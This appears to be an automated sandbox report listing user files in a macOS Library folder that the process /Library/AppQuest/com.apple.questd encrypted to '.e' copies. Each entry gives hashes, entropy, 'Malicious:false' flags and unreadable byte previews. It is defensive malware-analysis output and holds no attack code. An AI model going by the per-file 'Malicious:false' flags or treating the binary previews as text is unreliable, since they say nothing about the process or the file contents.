                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....m.~.Y.M]..2.zf7.....U.. ...urx.0jCl..<...g.{..."....)..x.n...[Qx.........../f...<..J..WF..p.}.t.h54...Xo:..{c.......K.{*..T...(y.....Q...........x......................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.security.cloudkeychainproxy3.keysToRegister.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):906
                                                                                                    Entropy (8bit):6.997553230296954
                                                                                                    Encrypted:false
                                                                                                    MD5:198ED5CED11DD028C81616C62FB65383
                                                                                                    SHA1:AC598FEB5B3E3672B9A380630FFE7BEC0B4E9656
                                                                                                    SHA-256:9DBFA2CF15C76BB63BE1C8BCB940D5CE86FAC41D4D4BA8B14A93AF3934DD446E
                                                                                                    SHA-512:81C16E3F4A31E474EF1A866B77355B2B8C4DD4FABD3C1D66C80DD3B67C5AF682AD4072417FF5B2B6F89B2F440C6AE18288BCA51577E57B2ECB5B9F4EFCB88823
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:........f.I.......P...}*..F.g...J{.u!....g..pP`J>..'_c[7.y..<..1y...oVC.S1)j.VJ5`......A.......z..pS}..R.Qm.4....A.....G....]..z.T..Q.H..m..fC...f}.`......#....V....|.....bb.X9..P+..20........$.8...#.:Mm>b..o.or...V`...z+...t......[9..*M}.:.A......;.wTM.U.....#.o3...^.i.m-...tTIl..$.2.......m....N....u.....o..+..j._.}l..$.2.......m....N....u9...............*..F.g..;s..:....&s..o..JpE..B*.^_>.u.......g..(y^..}.....z....3U....M.C.Y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.siri.context.service.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):354
                                                                                                    Entropy (8bit):4.891194688231415
                                                                                                    Encrypted:false
                                                                                                    MD5:AB0F5E71ED7A7C1966C4B97256ACA2DF
                                                                                                    SHA1:8173FFD6B43B7F628E314040CF8688ECE9084A95
                                                                                                    SHA-256:EA3762128F507005157A41B6DF221E622676C8832A9BC46DC5828E2077DE3E19
                                                                                                    SHA-512:8BE9A88A1EDA31914D9B3F38D0DB2ABCAE5A1B027F08F3E9D4E1EBDF9111A95883B2377CFE1DE59AB2DC9B513553C672FF69C3E2440C58BE62813128EC07B7D6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..t....M.I....|.. P...]..?.........?._C....1................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.textInput.keyboardServices.textReplacement.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1114
                                                                                                    Entropy (8bit):7.27231454712503
                                                                                                    Encrypted:false
                                                                                                    MD5:E30BB758B85FFED66E67A19390141317
                                                                                                    SHA1:0EEE96E24579E77DD39DFD43509F62546A126D6B
                                                                                                    SHA-256:59572F6046968EF634D4ADEE03D435E667FFC7556EED847B51216D3F45A60E59
                                                                                                    SHA-512:27EE4C1616797D5CA1962251248B1BB468AC414B65DADDC122FA462FB1A0742B169271C6BE78CE0877416DBC9B5996B3271C2612C1FAC25373CDC1CE9DB0BA2C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...,.=...H....th........%z..Sh]E....w.)n.6%|7q...-...uM.!...ua..0..f;.09.3.]c ..Y.iG..2`.X.d S.&.P.s.8.gF......0..)(...p7.2.s.R.X5....x.Efm..:b#.l8...tK..........&\@...N........CE.L.a..%.P.~.&9]_(.....O..w.....".t...j@..........p"R?$H.....G...x....v/vn~..G...5......@.......R....F....\.O.....w.....".t...j@..L...r....F.R.......M$.H... S......t.wu.G.-#...]+..j_..Y.V6..V4h......n.5......@...........":j(u.o....E.2.^.z.O.ym2I..K...M.@.*.:=...#....{.v.......``&......./H..d.\.U7.|.....9;.kT^....Z...NJ....@.....Q9...'.2.^.z.OaK.~40.'.Q.6L3..n9.0a..0.<..DR@c........ql....."....@...rA.n./ ...\$.i-.3.O..t...F.+..3..W.....-.8.c..hJ...il/qE...x.&..9$..;.....h...#N...?vw=.*...T.E.;.y.8....}..!c?._.....b...r.Hc.P...a..1......O&...T.....j..U:..n6....2.U{=...t.+-...=./.........B...*LL..a.....;..........n..o...)................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...................................
                                                                                                    /Users/ben/Library/Preferences/.com.apple.wifi.keychain-format.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):370
                                                                                                    Entropy (8bit):5.035275460246633
                                                                                                    Encrypted:false
                                                                                                    MD5:FC9E884D2A7A048948D6256426B76F50
                                                                                                    SHA1:2BDCB669CF4CE9F1F8E7E8B7861540245A710A17
                                                                                                    SHA-256:C965731B6D35ECF1FC83DD48D68A8C00DDA530B39EE17D525A0A310AAF61912A
                                                                                                    SHA-512:14108B7B5C2AB34610A207869ED38D2B3DC7BA117EA35602A823D385DEF287FD887AA797B6F5F890E78D661D83E0739519CB78CACB92A4B9E0B3681AA6FDE18D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.....-..[.#.I.(Hn......M2.......]!.........9.....Uv.^......A................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/.com.microsoft.autoupdate2.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):378
                                                                                                    Entropy (8bit):5.08255811008237
                                                                                                    Encrypted:false
                                                                                                    MD5:0FF48053888B343D086D3E53378C9DB2
                                                                                                    SHA1:381B21FFEAC9B205169B0269B52B7EA19909545E
                                                                                                    SHA-256:490546A4D240FF52AB1B773712EA7477108BA7C33926F4C59E1152D8A5759BA7
                                                                                                    SHA-512:1538FBBF0CE8D0684EBE5668A4857A86AD6F23ABCA185F65A3113A641F9041A35307A9F617AB6B1DA6F8B8F516674D5F469983F66C6FF78F2F2D33F85552C106
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..R......6.........F.W.P.......M2.......]!.........G...8..=&....X..I................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/ByHost/.com.apple.ManagedClient.FB2C97C6-63F5-5D81-A93F-BA4895BD7046.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):386
                                                                                                    Entropy (8bit):5.1525424260862716
                                                                                                    Encrypted:false
                                                                                                    MD5:7E05B5F4DB7AD40408BF92D8E6BF3647
                                                                                                    SHA1:5E06018DF2FBCF12F23E3621DC675C00D9F46DB2
                                                                                                    SHA-256:20E65666568D59CC206080888EA93F894F9248C8FADC498BC7535BE3E351B63A
                                                                                                    SHA-512:F3ABF497E65017D39FEEA28BCE2FD996894DFFEE1ABDE3A8365227CD026307AA33A25EDB72E3303BE16E8C5A64A5ADFDAC2462585AAB6773BB7577A58E48157C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......h.YAd...W...u..g4..y.Ms...<....~.@......|.. .#u....D...............E.Q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/ByHost/.com.apple.commcenter.csidata.FB2C97C6-63F5-5D81-A93F-BA4895BD7046.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):586
                                                                                                    Entropy (8bit):6.336215651301323
                                                                                                    Encrypted:false
                                                                                                    MD5:1A1515F7A7F95C0B9EA412FC510F8990
                                                                                                    SHA1:31EB1395D992E0004280D44B958C36FD8C8EB0FA
                                                                                                    SHA-256:DA104EE08EBE63B64C07E0B7F974F96364E5AC86D1DD20D1DDF19F96048F512C
                                                                                                    SHA-512:2ACB84B448F87EF32CD14F11B4AF6C90180DA35ED1858DB2C3FD6259A9BC6B6A56953F7E546C94EFF4512256B54F3EDC85D15E8DBA8DE64CAD95979647160C32
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....6/..........6~%....uj...QDm!lABk.q.......M{.h...j..(.i*G...r..6.2[.......%.fW.|#%*tO......FN....C$..X..8.a.Q.8K.w..(....>v.0.....u*..(.y;. ...kN............?.......UxR../.....[..~3.p.bV.|R]Oj%..)...<}....o..#o.j*......5......H.U..y5...p..{*..T....q.|m.$..........rQ....$..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/ByHost/.com.apple.coreservices.appleidauthenticationinfo.FB2C97C6-63F5-5D81-A93F-BA4895BD7046.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):490
                                                                                                    Entropy (8bit):5.920386653908958
                                                                                                    Encrypted:false
                                                                                                    MD5:D12D4681B1FE534E3D8968674BBA8EFF
                                                                                                    SHA1:7EA637FCD959EBF031BBED69159981DCBCB61AC3
                                                                                                    SHA-256:2DA119E558E8F91C1C0BE5DE02E4508FB8EB9956D3E34B97159429D082D3C92A
                                                                                                    SHA-512:7B233DF34E76165BFEF1C9832D81A6BC71FAB6DED11FBAA0868EB518A01DB28F563859EFEA7055C5903886242C288942B587139929EEF7925E4548B955F4C492
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....6/....am7...\oY.})'4.z....o.b..._.P.X..h.......?8.;0|...,.....2...w..]u...`1......A..(.|..g1..H.......-..:..!..=...B.....8.SZ........I..K.6..;h...7.....l. f.f..........dk...O..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Preferences/ByHost/.com.apple.dock.FB2C97C6-63F5-5D81-A93F-BA4895BD7046.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):410
                                                                                                    Entropy (8bit):5.404347580974669
                                                                                                    Encrypted:false
                                                                                                    MD5:BD5EEE736086F82ABD3C78A9CCF89DCF
                                                                                                    SHA1:C808B6310EE772A4658BA00EE4131E60213C5E73
                                                                                                    SHA-256:191B37FB5940752A0DB027352EB6C817700B9DCAB9A45E03FCEF12BD1E69F34E
                                                                                                    SHA-512:6C0D2E293821C357CE4D09BA247EEE4908197FF228469AF9558FA2BEE75FCA96EE96BFF8520B3621FC00AF1EAC6B0EA68ED1F2B8C237949828BF04510C47272E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..C...$.. .e...DH........*(......V.....S(..-^.....r....j.).c.....a...{)..".................TZ...j,.i................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/PubSub/Database/.Database.sqlite3.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):143746
                                                                                                    Entropy (8bit):4.324624996405458
                                                                                                    Encrypted:false
                                                                                                    MD5:7A56F94A69725D5DA130BF9FDE546F2A
                                                                                                    SHA1:692F1D9C1958C62DAD8ECA5FF7F6A9D2E415D7D9
                                                                                                    SHA-256:EED15FDF480CCE917AAE360DD78968962097B7EC341A54DB6BEF8D7F10236770
                                                                                                    SHA-512:F807A6D2E7311211B7A2F74C0AD7CCF04B365FDC682C0FF59C89187E9C13372E781DC98802EBC11F8BD04DD68B2F510FC895B1644BAF8712C18E0889F5D9CAF4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT..lP...i..X...{.k........C'.w.J....z...:`>...\v.xt...7............L.D<.+.~.$O......k.t:.p..L_..6E.I...?...q..Iy...C.......e..m.........`..........................................................................................................................................................................................L.D<.+..................................................................................l......IB.).b...=......~..."..|S.R.c.`.,1T!4...>....u>U.....q.8.x]{..e.YN#Vp.vg.3.M.J...-..b....J...6....L.../A|&u,............kiT..x.6...1w..MSi..(.".iL'!.g...P.....G#)FL.....W..3@.V`..1...a:g.`,.3e...hc%3,._.s..A.i.\c.Dz.......Vr..]dc....bo.E...EW...t.z....m......5.d....X.........h...........g.%vf../..b..G...H.G..G.T\5..l.6.AO..:..h@...df1...Z.$..S}...axs.b....lI..k.>f.K...)..Fv.X..H]%.wU0..n..'..M...Q.........y9:..Y....:G..~+......._+'l#$...d..#.9....,."..bec......#.U......5.8.}Bvt<{V....}.+...H.#....6../........5.8.}Bvt<{V..........T2.@*ZF>...{.5ru#...I9.y.8+o./..L
                                                                                                    /Users/ben/Library/Safari/LocalStorage/.http_www.faronics.com_0.localstorage.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12602
                                                                                                    Entropy (8bit):4.28597150002826
                                                                                                    Encrypted:false
                                                                                                    MD5:A16F2D2AB717CA7A33BF19B128126701
                                                                                                    SHA1:1BA0848E256B081CAB1B9D50C2C48BCFB2331CA6
                                                                                                    SHA-256:54C70DA15F395C1DFF7EF3AB8C63965546C3534A1F4937655AFE66C93D17F99D
                                                                                                    SHA-512:6C9679D4D91368E8CE4CA6DABA932F52A03B28B8DCFCC45B0F499FACD47D8FB73B807304AD4B6E1B80EFC2C23F12C24ED57EA8020E5DB845756F3F81F46F770E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT..lP...i..;..............=C.u.d..........t...7....................L.D<.+.L.s.h...q. U.|.V...0.....................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Safari/LocalStorage/.https_java.com_0.localstorage.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12602
                                                                                                    Entropy (8bit):3.8324676389309227
                                                                                                    Encrypted:false
                                                                                                    MD5:E7B89DD054AE02E7532291730BF765BB
                                                                                                    SHA1:8D7341F93D68EAACB158B464934D7B602DDE0B6F
                                                                                                    SHA-256:FAE7B641D4D2D0F235BCA9DE527DE93E1AA67113C791DFF47C03CD3B2FCE68AD
                                                                                                    SHA-512:19B73E356FEEBA0F72487BD1F6F9A65D7ED6D5E6E6EF344A3FA0418E7994549C0734271F4A52C7F325E4B8924867CB5C804732C115295C4872CEA410D3EF3477
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT..lP...i....%............=C.u.d..........t...7....................L.D<.+.%R4,....q. U.|.V...0.....................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Safari/LocalStorage/.https_www.apple.com_0.localstorage-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3112253228458615
                                                                                                    Encrypted:false
                                                                                                    MD5:E39F3E8D774005860C2C221E1C7C4159
                                                                                                    SHA1:3DCBCECBD9C45F45FDC7CDE22642F1D3226C5A75
                                                                                                    SHA-256:6DCA1F0F619AD42991C932A49D784E3129F69BC86419728006822B29A04D7E88
                                                                                                    SHA-512:4942F4AFF8956103AE4B1510E436268D782F92CA4DCE65589E6438D1D493F8BAD6430F16C0DDE5700A74FEC3392B80E2AFD4BC9C06C0E99B1453A57495C5EBF7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L.B. i....y.H.....5q...&....().'.3..nN...>.k....L.B. i....y.H.....5q...&....;d9.03..nN......\..|o..'..4...9.o..h$...........\..|o.y.H.....................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Safari/LocalStorage/.https_www.apple.com_0.localstorage-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Safari/LocalStorage/.https_www.apple.com_0.localstorage.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12602
                                                                                                    Entropy (8bit):3.987545746741104
                                                                                                    Encrypted:false
                                                                                                    MD5:4E8A4103A4E29292CB674C19BA09F3D1
                                                                                                    SHA1:F03CFC8501776706ED7F953C4ACFD5A53B5CF40B
                                                                                                    SHA-256:DE54BF92EACED90324936F48BDA65435676702185F8CC6A28B248AAACFDD5CED
                                                                                                    SHA-512:961404656B73FE37A51548BC857683AA7F7FB668C2F882083DECFF5B58D43D206FC1295BFC3E1532168DA31C39927D1ECB8871D3E9C79947A78644264D7C93CE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t...%............=C.u.d..........t...7....................L.D<.+.%R4,....;.......H.....C_.................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Safari/LocalStorage/.https_www.google.com_0.localstorage-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.314105252625364
                                                                                                    Encrypted:false
                                                                                                    MD5:9957DC010817047C3FBE651F90557CFA
                                                                                                    SHA1:8BF5E97AC88DD8E2370F911AD6AC2294AA9BC013
                                                                                                    SHA-256:DA601AA3D1BCB81ED3B892AF7AB367050BC47AEA5FD5AC0826272168DFE76E43
                                                                                                    SHA-512:FA38E456BF9B5F488B375D44A61B179781B7628FB63DC97970BB477BBB91188CA16946567DFAFF96A5902AF702FDA79BCBF420ABDE71BC10601292C7A5C42DC5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L.B. i....y.H....t....^d..zz6.9...6\.].!.>.k....L.B. i....y.H....t....^d.f..T.oq..6\.].!....\..|o..'..4...9.o..h$...........\..|o.y.H.....................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Safari/LocalStorage/.https_www.google.com_0.localstorage-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Safari/LocalStorage/.https_www.google.com_0.localstorage.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12602
                                                                                                    Entropy (8bit):3.6842717967751004
                                                                                                    Encrypted:false
                                                                                                    MD5:AB61060B5B60D7C8B00EB82D14E95129
                                                                                                    SHA1:009DBA4082FB12A26DED70C2F59A5810B8B1F623
                                                                                                    SHA-256:0FB27E29BD911662B12C116AD8B885F102872DFB7E874E413F2EF069A8D64967
                                                                                                    SHA-512:13C2F891ADD4B3233765A64DA2DCB1C816080F61AADEE6A22CD595B971961C3C0275D29ED6875766BE13073F2685F77F828FDBEB39C00622B8AA72B084483541
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t...%............=C.u.d..........t...7....................L.D<.+.%R4,....;.......H.....C_.................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Safari/LocalStorage/.https_www.oracle.com_0.localstorage-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3126270624609555
                                                                                                    Encrypted:false
                                                                                                    MD5:7CF1AEC7A80625E7D6B1B3E57B6FA50B
                                                                                                    SHA1:432F9666F77B844FF73009D662E1380415A618B2
                                                                                                    SHA-256:3CD65A2E836E0153763A61EE5661F9F8E5ACC00D5C6397B156FF9F76CE3182D8
                                                                                                    SHA-512:32164E10F0E4EC4C813442B7AF224BFF11F8596D4110C43F24F3E3B60329ECBBC7E7C2AB7ABB36E946D326DD9A2BC262839E16AAADAE1EB809760E580B457D6B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L.B. i....y.H.....\L.p...s..2.e.~.r.B.t=.>.k....L.B. i....y.H.....\L.p...d...g..i.r.B.t=....\..|o..'..4...9.o..h$...........\..|o.y.H.....................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Safari/LocalStorage/.https_www.oracle.com_0.localstorage-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Safari/LocalStorage/.https_www.oracle.com_0.localstorage.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12602
                                                                                                    Entropy (8bit):4.111120094457628
                                                                                                    Encrypted:false
                                                                                                    MD5:92C8599D4C13AEB3EAEFEED3333113CA
                                                                                                    SHA1:768B68246A3AC1F8E453CD878493FEA3620F5672
                                                                                                    SHA-256:D4EA00A1CC7E167046BD253847C9AD72458714E89042AAFF828B7DB7CC835925
                                                                                                    SHA-512:AAB6D438BC8A67D2C18B75AC4572A6E375DEDE5814BAE17BFB3D6C906C53AF86497B216BEAA1B9F99DF4617CB568A0D468421B7FECC0EC2515B0C466DB5428ED
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t...%............=C.u.d..........t...7....................L.D<.+.%R4,....;.......H.....C_.................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Safari/Touch Icons Cache/Images/.0A137B375CC3881A70E186CE2172C8D1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6026
                                                                                                    Entropy (8bit):7.916372566551395
                                                                                                    Encrypted:false
                                                                                                    MD5:3C1B2A0F2864A48015DCB83DD257BA59
                                                                                                    SHA1:577EACEC23DD5E6105600B8DB2011AEFD17165C7
                                                                                                    SHA-256:2451C063D325F17E446A996601FECA2C1D88DA3AA9DD21315D818B2350AD1F97
                                                                                                    SHA-512:DD461E5DECD5AF70DF4B82AFB435619198A08E7C5D0396C11AF0587BFFE02250B7A7F9220898F7FC35C3F2B67F5278197EA5AC51C33B322CFF37946B7A2A01BF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj.]..R@:w..P.........P.......oq8_8=...r....].%....N.?.....~T. [..$t...Nnc.t@.O..p.......\..E>BAa..0J.;?3.D]...........>.0%?.\ U.R:....w.U..M.....M.....)..dK..%..>....0....-......e.X..`t....>.8./8i.N.}..c5."..V.^>..NmbN..ae.].J.Y..|.ocX2..Bv.%..8P. .Y..N~.....t.[t..7.=.E.?... ..X.l.4w..'...].......P...-..,....K\.D...V..$$.Q....._......6.....X...~u.,9......W........0.p...r.G.O.m.D..#.....F.[.#9.......s..?.....\._.T[...~...~o..E.....PA....eHH..7..3 .B.Y..>....[.AU.f.fS].4H...`.......x@....@..>..M..L.p.,.....!7.>..q.....kun.....l.....z.;s.."..)!..QU. ............u.I.\..Po.......`......~......8.i..\o.....:..@...\,..+:....d.... ........4.B........i.....U.h...I..f.&......X..........@....`...^n_gUW........l..Q.?.U..:..L.z........D.K.n%............z..........#.n.t..S...c................7W2.G.......j>4.....X.,.pt.oKX..&~....pO...........7_......%....~L.B.6C...H?.m.........`.O.\..q.lK.W.w.....Y.n....=.|...^&...8...|....'....o.J..Y..(....Y4k.........4..:.0..S.H.:[6..i.#.!.w......2.c
                                                                                                    /Users/ben/Library/Safari/Touch Icons Cache/Images/.1B03577ED104F16AADC00A639D33CB44.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):13986
                                                                                                    Entropy (8bit):7.975141980079122
                                                                                                    Encrypted:false
                                                                                                    MD5:11C5EB97048BE6E8E09AEAC243B457C6
                                                                                                    SHA1:80C2332AF831BD9A78B618CA4452CBF048F7136C
                                                                                                    SHA-256:BDDE9BD2DBB22EE15A32C302C44265931009CCD9B74DFF5B0753A45E449287E9
                                                                                                    SHA-512:62A07675B4B7219A04F9F4C4AD22759F18079FCA9BC24F9BDEA54E54A0BCC67A18FBDAE32305B8959FCC98DBB0E428B2126A57AB998941D12A4EC069F96C3CF1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
